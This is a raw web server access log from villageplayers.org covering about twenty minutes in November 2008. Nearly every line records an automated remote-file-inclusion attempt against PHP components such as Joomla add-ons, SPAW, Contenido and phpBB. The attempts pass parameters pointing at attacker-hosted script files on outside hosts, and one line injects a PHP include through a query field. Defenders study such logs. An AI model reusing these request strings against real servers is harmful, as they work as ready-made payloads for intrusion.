212.26.227.88 - - [21/Nov/2008:21:00:03 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
212.26.227.88 - - [21/Nov/2008:21:00:05 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:00:06 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:00:06 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
212.26.227.88 - - [21/Nov/2008:21:00:07 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
208.80.194.33 - - [21/Nov/2008:21:00:20 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MyIE2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:00:28 -0800] "GET /logs/access_081003.log//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:00:30 -0800] "GET /logs/access_081003.log//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
85.43.93.220 - - [21/Nov/2008:21:00:44 -0800] "GET /logs/access_080921.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
195.209.236.77 - - [21/Nov/2008:21:00:56 -0800] "GET /logs/access_081104.log//?path%5Bdocroot%5D=http://oursoultvxq.com/bbs/data/bbs/ideex.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:01:21 -0800] "GET /logs/access_081104.log//components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:01:21 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:01:21 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
66.160.185.20 - - [21/Nov/2008:21:01:34 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:01:40 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:01:40 -0800] "GET /config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:01:45 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
217.111.67.5 - - [21/Nov/2008:21:01:45 -0800] "GET /config/dbutil.bck.php?confdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
66.160.185.20 - - [21/Nov/2008:21:01:57 -0800] "GET /logs/access_080921.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.villageplayers.org"
66.160.185.20 - - [21/Nov/2008:21:01:57 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.villageplayers.org"
66.160.185.20 - - [21/Nov/2008:21:01:58 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.villageplayers.org"
74.55.13.210 - - [21/Nov/2008:21:02:01 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.villageplayers.org"
74.55.13.210 - - [21/Nov/2008:21:02:01 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.villageplayers.org"
74.55.13.210 - - [21/Nov/2008:21:02:01 -0800] "GET /logs/access_080921.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:02:23 -0800] "GET /logs/access_080921.log//components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
74.55.13.210 - - [21/Nov/2008:21:02:33 -0800] "GET /logs/access_081104.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:03:53 -0800] "GET /logs/access_081104.log//?path%5Bdocroot%5D=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:04:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:04:21 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:05:56 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
195.12.53.176 - - [21/Nov/2008:21:07:25 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:08:15 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 4926 "-" "libwww-perl/5.50" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:08:16 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 763 "-" "libwww-perl/5.50" "villageplayers.org"
66.160.185.20 - - [21/Nov/2008:21:08:38 -0800] "GET /logs/access_081104.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.villageplayers.org"
74.55.13.210 - - [21/Nov/2008:21:08:47 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "villageplayers.org"
74.55.13.210 - - [21/Nov/2008:21:08:47 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:09:00 -0800] "GET /logs/access_081104.log//?path%5Bdocroot%5D=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:09:01 -0800] "GET /?path%5Bdocroot%5D=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:09:01 -0800] "GET /logs//?path%5Bdocroot%5D=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:09:07 -0800] "GET /logs/access_081104.log//?path%5Bdocroot%5D=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:09:08 -0800] "GET /?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:09:08 -0800] "GET /logs/access.log%20%20/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:09:08 -0800] "GET /logs/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:09:08 -0800] "GET /logs/access_080921.log%20//components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:09:31 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:11:13 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:11:14 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "villageplayers.org"
85.214.37.182 - - [21/Nov/2008:21:11:46 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gsch.org//bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.villageplayers.org"
85.214.37.182 - - [21/Nov/2008:21:11:46 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gsch.org//bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:11:58 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:11:58 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:12:01 -0800] "GET /?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:12:01 -0800] "GET /logs/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "villageplayers.org"
67.19.90.90 - - [21/Nov/2008:21:12:01 -0800] "GET /logs/access.log/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
85.214.37.182 - - [21/Nov/2008:21:12:03 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gsch.org//bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "villageplayers.org"
85.214.37.182 - - [21/Nov/2008:21:12:04 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gsch.org//bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:12:41 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.fileden.com/files/2008/10/20/2152050/id6v.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:12:41 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.fileden.com/files/2008/10/20/2152050/id6v.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:12:42 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fileden.com/files/2008/10/20/2152050/id6v.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:13:17 -0800] "GET /logs/scripts.log HTTP/1.1" 200 851968 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:14:42 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:14:42 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:14:42 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "villageplayers.org"
195.209.236.77 - - [21/Nov/2008:21:14:54 -0800] "GET /?sourcedir=http://oursoultvxq.com/bbs/data/bbs/ideex.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.villageplayers.org"
195.209.236.77 - - [21/Nov/2008:21:14:54 -0800] "GET /logs/?sourcedir=http://oursoultvxq.com/bbs/data/bbs/ideex.txt????? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.villageplayers.org"
195.209.236.77 - - [21/Nov/2008:21:14:54 -0800] "GET /logs/access.log/?sourcedir=http://oursoultvxq.com/bbs/data/bbs/ideex.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
66.197.222.85 - - [21/Nov/2008:21:14:58 -0800] "GET /logs/access_081104.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.dehouse.com.br/.vL/idxxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
66.197.222.85 - - [21/Nov/2008:21:14:58 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.dehouse.com.br/.vL/idxxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
66.197.222.85 - - [21/Nov/2008:21:14:58 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dehouse.com.br/.vL/idxxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:15:09 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:15:21 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:15:21 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
85.190.1.205 - - [21/Nov/2008:21:15:38 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.roquetartdanse.com/smsvnid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:16:29 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:16:30 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:16:30 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:16:39 -0800] "GET /logs/access_081104.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:16:39 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
88.116.96.124 - - [21/Nov/2008:21:17:09 -0800] "GET /logs/access_081104.log//admin/spaw/spaw_control.class.php?spaw_root=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
88.116.96.124 - - [21/Nov/2008:21:17:09 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
88.116.96.124 - - [21/Nov/2008:21:17:10 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:17:19 -0800] "GET /logs/access_080716.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:17:34 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:17:34 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:17:35 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:05 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.fileden.com/files/2008/10/20/2152050/id6v.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:21 -0800] "GET /?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:21 -0800] "GET /logs/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:21 -0800] "GET /logs/access.log%20%20/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:46 -0800] "GET /?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:46 -0800] "GET /logs/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.villageplayers.org"
78.110.50.102 - - [21/Nov/2008:21:18:46 -0800] "GET /logs/access.log%20%20/?sourcedir=http://geocities.com/feelcomz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
89.218.85.18 - - [21/Nov/2008:21:18:47 -0800] "GET /logs/access_081104.log//newspublish/include.php?path%5Bdocroot%5D=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
85.190.1.205 - - [21/Nov/2008:21:20:01 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.roquetartdanse.com/smsvnid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
203.114.112.155 - - [21/Nov/2008:21:20:09 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
203.114.112.155 - - [21/Nov/2008:21:20:09 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:20:15 -0800] "GET /logs/access.log/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:20:15 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:20:15 -0800] "GET /logs/?sourcedir=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.villageplayers.org"
59.126.46.141 - - [21/Nov/2008:21:20:23 -0800] "GET /logs/access_081104.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.villageplayers.org"
59.126.46.141 - - [21/Nov/2008:21:20:24 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.villageplayers.org"
59.126.46.141 - - [21/Nov/2008:21:20:24 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:20:39 -0800] "GET /logs/access_080625.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:20:47 -0800] "GET /errors.php?error=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:20:47 -0800] "GET /logs/errors.php?error=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:20:47 -0800] "GET /logs/access_080921.log/errors.php?error=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:21:16 -0800] "GET /errors.php?error=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:21:16 -0800] "GET /logs/errors.php?error=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:21:16 -0800] "GET /logs/access_080921.log/errors.php?error=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:21:24 -0800] "GET /logs/access.log/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:21:24 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:21:24 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
64.254.233.2 - - [21/Nov/2008:21:21:26 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.villageplayers.org"
